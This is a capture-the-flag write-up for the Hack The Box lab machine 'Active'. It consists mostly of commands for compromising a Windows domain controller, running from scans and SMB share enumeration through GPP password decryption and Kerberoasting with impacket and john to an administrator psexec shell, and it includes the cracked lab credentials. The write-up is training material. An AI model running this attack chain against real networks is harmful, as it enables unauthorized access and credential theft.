Machine: https://app.hackthebox.com/machines/148
Enumeration
Port Scanning
- Getting the open ports using nmap
nmap -p- -sS -n -Pn --min-rate 5000 10.10.10.100- Enumerating service and versions, as well running some common scripts
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389 -sCV -n -Pn --min-rate 5000 10.10.10.100 -oN TargetedResult
Domain name: active.htb
Windows server Version: windows_server_2008:r2:sp1 (old)
LDAP
- We can use ldapsearch in order to collect some info (as we can stablish a connection, because we need valid credentials, we can continue with the enumeration)
ldapsearch -H ldap://10.10.10.100 -x -s baseDC Name: dc$@ACTIVE.HTB
SMB
- Lets try to use a null session to get info using smbclient
smbclient -L //10.10.10.100 -NResult
- In order to read the folder permisions we can user crackmapexec or nxc
crackmapexec smb 10.10.10.100 -u '' -p '' --shares -d active.htbResult
- Lets go into this folder
smbclient //10.10.10.100/Replication -NResult
Exploitation
- Looks like we have a replication of the
SYSVOLfolder, as the version of windows is old we can try to get the cached GPP\\active.htb\Replication\Policies\*\Machine\Preferences\Groups\Groups.xml
mget \\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xmlResult
- now we can use a tool like gpp-decrypt
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'Result
Credentials active.htb\SVC_TGS:GPPstillStandingStrong2k18
- If we test de credentials using crackmapexec , they are valid
crackmapexec smb 10.10.10.100 -u 'active.htb\SVC_TGS' -p 'GPPstillStandingStrong2k18'Result
Enumeration 2
LDAP
- Using the credentials
ldapsearch -H ldap://10.10.10.100 -x -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b 'DC=active,DC=htb'
or
ldapdomaindump 10.10.10.100 -u 'active.htb\svc_tgs' -p 'GPPstillStandingStrong2k18'
Result
Bloodhound
- Using bloodhaund-python and bloodhaunt to get a better view of the AD enviroment
bloodhound-python -d active.htb -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' -c ALL -ns 10.10.10.100 --dns-tcpSMB
- Now we can access an other folders
crackmapexec smb 10.10.10.100 -u 'active.htb\SVC_TGS' -p 'GPPstillStandingStrong2k18' --sharesResult
- We are able to enumerate users using RID
crackmapexec smb 10.10.10.100 -u 'active.htb\SVC_TGS' -p 'GPPstillStandingStrong2k18' --rid-brute
or
# to get only user names
crackmapexec smb 10.10.10.100 -u 'active.htb\SVC_TGS' -p 'GPPstillStandingStrong2k18' --rid-brute | grep -oP '(?<=ACTIVE\\)(\S+)(?= \(SidTypeUser\))'
Result
- The share “users” if quite interesting, because inside “Default” folder we found some file named “NTUSER.DAT” this type of files contains recent access and credentials, we can use a tool like regripper, but there are no useful information
smbclient //10.10.10.100/Users -U active.htb/SVC_TGS%GPPstillStandingStrong2k18 -c 'mget "Default"/*'Result
Exploitation
- We can try to get a list of SPN (a identifier of a service instance, Kerberos use it to associate a service with a sign-in account) using impacket-GetUserSPNs , then we can crack it
impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -save -output GetUserSPN.outResult
- Now we can use john the ripper
john GetUserSPN.out --wordlist=/usr/share/wordlists/rockyou.txt -format=krb5tgsResult
Credentials:
Administrator:Ticketmaster1968
- Testing the credentials
crackmapexec smb 10.10.10.100 -u 'active.htb\Administrator' -p 'Ticketmaster1968' -x 'whoami /priv'Result
Getting Access
- We can psexec.py to get a interactive shell
psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100Result
